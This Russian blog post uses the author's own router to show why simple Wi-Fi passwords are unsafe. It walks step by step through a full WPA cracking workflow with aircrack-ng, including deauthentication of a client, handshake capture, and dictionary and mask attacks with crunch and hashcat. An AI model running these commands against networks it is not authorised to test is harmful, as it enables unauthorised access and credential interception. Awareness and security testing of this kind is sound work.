Чего не стоит делать простые пароли к вашему Wi-Fi

Опубликовано admin -

Cтатейка не о том, как взломать, точнее подобрать пароль к Wi-Fi, а чего не стоит делать. Простые пароли к вашему Wi-Fi, не углубляясь в теорию, или рассказывая сказки, как могут взломать. Я покажу на собственном примере, хотя я и знаю свой пароль на своем Wi-Fi роутере, как я к нему подберу пароль. Некоторые скажут: ну, дорвался сосед к халявному интернету, ну и что? Не тут то и было. Чуть дальше я покажу опять же на собственном примере, как перехватывают пароли к Mail.ru различным сайтам и кошелькам и тд.

Что мы имеем:
1) Ноутбук или (Компьютер) для перехвата и подбора пароля + USB TP-LINK TL-WN722N.
2) Смартфон уже подключенный к Wi-Fi роутеру.


Поехали. Все это безобразие будем делать на Linux Mint, но лучше всего Live Kali Linux так как там уже предустановленны сетевые шняжки Aircrack-ng и тд. и на других дистрибутивах Ubuntu, Debian даже на FreeBSD и Windows все это можно проделать.
Предположим, что вы уже скачали, запустились с Флешки-CD-DVD или 3,5 или 5,24 дискеты.

Открываю терменалку и выполню команду airmon-ng, чтобы узнать как мой wi-fi USB-адаптер определился.

# sudo airmon-ng
Определился как интерфейс wlxf81a671b1f5b, теперь переводим wifi-клиент в режим монитора:
# sudo airmon-ng start wlxf81a671b1f5b

wlxf81a671b1f5b        Atheros AR9271    ath9k - [phy1]
                (monitor mode enabled on
mon0)

Создался виртуальный интерфейс mon0

Теперь сканирую эфир с помощью airodump-ng:

# sudo airodump-ng mon0

Нахожу свой Wi-Fi роутер в списке моих соседей, как и писал выше буду перехватывать пароль сам у себя.
Переключяюсь:

# sudo airodump-ng -w USSR -c 7 --bssid 34:CE:00:2E:B2:03 mon0

-w – название дамп-файла
-c – номер канала
–bssid – MAC-адрес точки доступа

Перехват возможен тогда, когда к Wi-Fi роутеру подключен клиент.

11

Оставляю окно терминала, где работает airodump-ng открытым. Открываю новое окно, в котором пишу:
# sudo aireplay-ng -0 3 -a 34:CE:00:2E:B2:03 -c 78:11:DC:43:1A:AD mon0
эта команда заставляет переподключиться, тем самым отправить пароль на роутер  

Проверяю командой успело ли перехватить ключик или нет, если нет - повторяю
(
sudo aireplay-ng -0 3 -a 34:CE:00:2E:B2:03 -c 78:11:DC:43:1A:AD mon0)

# aircrack-ng handshaketest-01.cap

   #  BSSID              ESSID                     Encryption
   1  34:CE:00:2E:B2:03 USSR                      WPA (
1 handshake)

Все ОК. Для того, чтобы расшифровать, нам нужен словарь, сделаем не большой словарь из мобильных телефонов 067******* Киевстара.
#crunch 10 10 1234567890 -t 067@@@@@@@ -o kyivstar067.txt

Теперь приступаем к расшифровке
# aircrack-ng -l password.txt -w kyivstar067.txt -0 USSR-01.cap

Если пароль удалось подобрать, что у меня и получилось, вижу красную яркую надпись

 KEY FOUND! [ 0671111111 ]

так же пароль продублирован в файле password.txt

Так же есть еще один способ подбора пароля без словаря с помощью Crunch или Hashcat  он скорее удобен если мы хотим подобрать цифровой или 
допустим знаем, что пароль состоит из слова natasha*** и пару цифр.

# crunch 10 10 -t 06711111%% | aircrack-ng -l ussr.txt -w - -e USSR USSR-01.cap
# hashcat --stdout -a 3 0671111?d?d?d | aircrack-ng -l ussr.txt -w - -e USSR USSR-01.cap

Еще не большая хитрость, для того что бы закрыть терминальное окно, не закрывая процесс подбора пароля,
есть замечательная утилита Nohup*
 

А теперь о выше сказанном, подбор пароля по словарю 067******* заняло 3ч и при условии, что у меня процессор устаревший Intel Pentium Dual Core, если пароль просто цифровой из 8 цифр, подбор пароля занимает +/- 12часов, из 10 цифр уже сложнее и дольше, а вот хотя бы 1 буква или спец знак @#$%^&& почти не реально, hashcat может справиться быстрее если у вас майнинг ферма, перебросить вычислительный процесс на видео карты.
Т.е. 1 это центральные процессор, а 2 это графический процессор, тогда команда вместе с выбором всех доступных устройств будет выглядеть -D 1,2

А так же появился более понятнее инструмент для взлома пароля беспроводной сети, это Wifite, но про него я думаю не буду писать статейку сама суть статьи что простые пароли взламываются элементарно

 

Теги

Добавить комментарий

Ограниченный HTML

  • Допустимые HTML-теги: <a href hreflang> <em> <strong> <cite> <blockquote cite> <code> <ul type> <ol start type> <li> <dl> <dt> <dd> <h2 id> <h3 id> <h4 id> <h5 id> <h6 id>
  • Строки и абзацы переносятся автоматически.
  • Адреса веб-страниц и email-адреса преобразовываются в ссылки автоматически.
CAPTCHA
6 + 4 =
Решите эту простую математическую задачу и введите результат. Например, для 1+3, введите 4.
Этот вопрос задается для того, чтобы выяснить, являетесь ли Вы человеком или представляете из себя автоматическую спам-рассылку.